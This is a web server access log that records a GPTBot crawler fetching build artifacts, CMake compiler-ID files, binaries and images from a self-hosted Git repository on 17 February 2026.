"/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10965] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:17:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 14961] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33371] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13845] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13811] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:17:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20165] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43101] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21736] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:17:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42451] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21631] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:17:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:17:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13847] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:17:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 14999] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15015] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20164] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20163] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20123] [Gzip 9.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:17:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 14979] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:17:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:17:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13846] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:17:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 